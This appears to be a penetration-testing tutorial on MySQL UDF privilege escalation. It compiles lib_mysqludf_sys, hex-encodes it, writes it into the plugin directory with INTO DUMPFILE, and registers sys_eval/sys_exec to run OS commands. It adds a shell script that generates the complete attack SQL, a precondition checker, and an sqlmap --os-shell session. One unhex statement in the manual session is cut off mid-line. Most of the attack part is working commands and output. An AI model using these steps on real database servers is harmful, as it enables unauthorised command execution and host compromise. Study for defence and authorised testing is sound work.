A UDF (user-defined function) is a shared library that MySQL loads into the server process. The lib_mysqludf_sys library defines functions such as sys_exec and sys_eval that run operating-system commands, so an attacker who holds a sufficiently privileged MySQL account can obtain shell command execution on the host that would otherwise be out of reach (the commands run as the OS account that mysqld runs under).
Some articles online use the file sqlmap-master\udf\mysql\linux\64\lib_mysqludf_sys.so_ from sqlmap's source tree, but in testing that file fails to load:
mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno: 22 /usr/lib64/mysql/plugin/udf.so: invalid ELF header)
The reason is that the .so_ files shipped with sqlmap are cloaked: they are obfuscated with extra/cloak/cloak.py so that antivirus does not flag them (the trailing underscore marks a cloaked file), and sqlmap decloaks them in memory at run time. Copying the raw file to the server therefore hands MySQL something that is not an ELF binary. Either decloak it first (python extra/cloak/cloak.py -d -i lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so) or, as below, build the library from source.
Download the lib_mysqludf_sys source: https://github.com/mysqludf/lib_mysqludf_sys
Unpack it and compile it in the source directory:
gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
Note: when compiling the source you may hit the following error
In file included from lib_mysqludf_sys.c:40:
/usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory
This is caused by a bug in the MySQL headers: edit /usr/include/mysql/my_global.h, comment out line 626 (the #include of my_compiler.h) and compile again.
Once lib_mysqludf_sys.so has been built, convert it to a hex string with Hex.hta (on Linux, xxd -p lib_mysqludf_sys.so | tr -d '\n' produces the same string). Then, in the MySQL client, look up the plugin directory:
mysql> show variables like '%plugin%';
+---------------+-------------------------+
| Variable_name | Value                   |
+---------------+-------------------------+
| plugin_dir    | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)
mysql> select * from func; # check whether someone has already registered a UDF
mysql> select unhex('7F454C
Query OK, 1 row affected (0.01 sec) # writing the file requires write permission on the /usr/lib64/mysql/plugin/ directory
mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.03 sec)
mysql> select * from func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval | 0   | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)
mysql> select * from func;
Empty set (0.00 sec)
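The manual session above, packaged as a script that produces the SQL statements from a compiled library. This is an added example, not code from the post or from the lib_mysqludf_sys project: the function names so_to_hex and gen_udf_sql are invented here, the plugin directory and the library file name are passed in by the caller because they differ per target (the post uses /usr/lib64/mysql/plugin and mysqludf.so), and the hex conversion uses od in place of Hex.hta.

```shell
#!/bin/sh
# Added example (not from the original post): turn a compiled
# lib_mysqludf_sys.so into the SQL session used above (write the library
# into plugin_dir with INTO DUMPFILE, register the functions, verify,
# clean up). Function names and argument layout are this example's own.

# Hex-encode a file as one uppercase string, the same output Hex.hta gives.
# od is used rather than xxd because it is POSIX and present on minimal hosts.
so_to_hex() {
    od -An -v -tx1 "$1" | tr -d ' \n' | tr 'a-f' 'A-F'
}

# Emit the SQL for one library. Arguments: path to the .so, the server's
# plugin_dir (from SHOW VARIABLES LIKE 'plugin_dir'), and the file name to
# create inside that directory.
gen_udf_sql() {
    so="$1"; plugin_dir="${2%/}"; soname="$3"
    hex=$(so_to_hex "$so")
    [ -n "$hex" ] || { echo "gen_udf_sql: cannot read $so" >&2; return 1; }

    cat <<EOF
-- 1. Anything registered already? A row here means someone has been here before.
select * from mysql.func;
-- 2. Write the raw bytes into plugin_dir. DUMPFILE (not OUTFILE) is required:
--    OUTFILE escapes bytes and appends a newline, which would corrupt the ELF.
--    Needs the FILE privilege, a secure_file_priv that allows this path, and a
--    plugin_dir that the mysqld OS user can write to.
select unhex('$hex') into dumpfile '$plugin_dir/$soname';
-- 3. Register the two command-execution functions exported by lib_mysqludf_sys.
create function sys_eval returns string soname '$soname';
create function sys_exec returns int soname '$soname';
-- 4. Verify: the answer is the OS account mysqld runs as, not necessarily root.
select sys_eval('id');
-- 5. Clean-up, to run when finished (the file in plugin_dir must be removed
--    separately, e.g. through sys_exec, before the functions are dropped).
-- drop function sys_eval;
-- drop function sys_exec;
EOF
}

# Stand-alone use:
#   sh gen_udf_sql.sh lib_mysqludf_sys.so /usr/lib64/mysql/plugin mysqludf.so | mysql -uroot -p
if [ "$#" -eq 3 ]; then
    gen_udf_sql "$1" "$2" "$3"
fi
```

The hex string for an 8 KB library is well under the default max_allowed_packet, so it can go in a single statement; the generated file should be deleted afterwards, since it contains the whole library in clear.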
Preconditions:
1) A MySQL account with enough privilege, in practice root with a weak password: SELECT ... INTO DUMPFILE needs the FILE privilege and CREATE FUNCTION needs INSERT on the mysql database. The server's secure_file_priv setting must also allow writing into the plugin directory: if it is NULL, INTO DUMPFILE is disabled altogether, and if it names a directory (the usual default on MySQL 5.7 and later, commonly /var/lib/mysql-files), only that directory can be written, so the library can never land in plugin_dir.
2) The OS account mysqld runs as must be able to write to the plugin directory. With a yum-installed MySQL, for example, the directory belongs to root:
[root@template tmp]# ls -ald /usr/lib64/mysql/plugin
drwxr-xr-x. 2 root root 4096 Apr 25 08:33 /usr/lib64/mysql/plugin
and mysqld runs as the mysql user by default, which has no write access to it.
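A pre-flight check for the two preconditions just listed, as an added example that is not part of the original post. It takes the plugin_dir and secure_file_priv values as shown by SHOW VARIABLES plus the OS account from the mysqld process list; the function names and the argument layout are invented here, and the writability test mirrors the ls -ld check above (owner and world bits only, group membership deliberately not consulted).

```shell
#!/bin/sh
# Added example (not from the original post): check the two preconditions
# before attempting the upload. Function names are this example's own.

# Does secure_file_priv permit INTO DUMPFILE to $2? MySQL shows the variable
# as NULL (file writes disabled), an empty string (unrestricted) or a
# directory (writes allowed only below that directory).
secure_file_priv_allows() {
    priv="$1"; target="$2"
    case "$priv" in
        NULL) return 1 ;;
        "")   return 0 ;;
        *)    priv="${priv%/}"
              case "$target" in
                  "$priv"/*) return 0 ;;
                  *)         return 1 ;;
              esac ;;
    esac
}

# Can OS user $2 create a file in directory $1? Decided from ls -ld, like the
# check in the post: root always can, the owner can if the owner-write bit is
# set, anyone can if the world-write bit is set. Group membership is not
# consulted (it would need the user to exist locally), so "no" can be a false
# negative when mysqld's group owns the directory.
dir_writable_by_user() {
    dir="$1"; user="$2"
    [ -d "$dir" ] || return 1
    [ "$user" = root ] && return 0
    set -- $(ls -ld "$dir")            # $1 = mode string, $3 = owner
    mode="$1"; owner="$3"
    case "$mode" in
        ????????w*) return 0 ;;        # world-writable (9th character)
    esac
    if [ "$owner" = "$user" ]; then
        case "$mode" in ??w*) return 0 ;; esac   # owner-writable (3rd character)
    fi
    return 1
}

# Combined verdict. Arguments: plugin_dir, secure_file_priv as shown by MySQL,
# the OS account mysqld runs as. Prints one line per check; exit status 0
# only when both pass. x.so is a placeholder name: only the directory matters.
udf_preflight() {
    plugin_dir="${1%/}"; priv="$2"; mysqld_user="$3"
    ok=0
    if secure_file_priv_allows "$priv" "$plugin_dir/x.so"; then
        echo "secure_file_priv='$priv': dumpfile into $plugin_dir allowed"
    else
        echo "secure_file_priv='$priv': dumpfile into $plugin_dir blocked"; ok=1
    fi
    if dir_writable_by_user "$plugin_dir" "$mysqld_user"; then
        echo "$plugin_dir: writable by $mysqld_user"
    else
        echo "$plugin_dir: not writable by $mysqld_user"; ok=1
    fi
    return $ok
}

# Stand-alone use: sh udf_preflight.sh /usr/lib64/mysql/plugin "" mysql
if [ "$#" -eq 3 ]; then
    udf_preflight "$1" "$2" "$3"
fi
```

For the yum-installed layout shown above (root-owned 755 directory, mysqld as mysql) the second check fails, which is exactly the case the post describes; it passes on a host where mysqld runs as root, which is what the sqlmap run further down turns out to be.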
UDF escalation can also be driven directly from sqlmap with the -d option (direct connection to the DBMS).
The connection string syntax is "DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" or "DBMS://DATABASE_FILEPATH".
[1] dbms: the database type, here mysql
[2] user: the database user, here root
[3] password: that user's password, Hehe123456 on my test server
[4] dbms_ip: the IP address of the database server, here 192.168.192.120
[5] dbms_port: the port the database server listens on
[6] database_name: the database to use
Here it is verified with sqlmap under Kali:
root@kali:~# sqlmap -d "mysql://root:Hehe123456@192.168.192.120:3306/test" --os-shell
___
__H__
___ ___[']_____ ___ ___ {1.1.3#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:56:51
[16:56:51] [INFO] connection to mysql server 192.168.192.120:3306 established
[16:56:51] [INFO] testing MySQL
[16:56:51] [INFO] confirming MySQL
[16:56:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:56:51] [INFO] fingerprinting the back-end DBMS operating system
[16:56:51] [INFO] the back-end DBMS operating system is Linux
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:51] [INFO] testing if current user is DBA
[16:56:51] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[16:56:57] [INFO] checking if UDF 'sys_eval' already exist
[16:56:57] [INFO] checking if UDF 'sys_exec' already exist
[16:56:57] [INFO] detecting back-end DBMS version from its banner
[16:56:57] [INFO] retrieving MySQL plugin directory absolute path
[16:56:57] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:58] [INFO] the local file '/tmp/sqlmap6szFlF1831/lib_mysqludf_syswZxteE.so' and the remote file '/usr/lib64/mysql/plugin/libsmuur.so' have the same size (8040 B)
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_eval does not exist')
[16:56:58] [INFO] creating UDF 'sys_exec' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_exec does not exist')
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapoutput'")
[16:56:58] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[16:56:58] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'root'
Note that whoami returns root here, so on this target mysqld itself was running as root, whereas the same call in the manual session above returned mysql. The UDF executes with exactly the privileges of the mysqld process: what is gained is an OS shell as that process's user, and getting from there to root is a separate step unless mysqld already runs as root.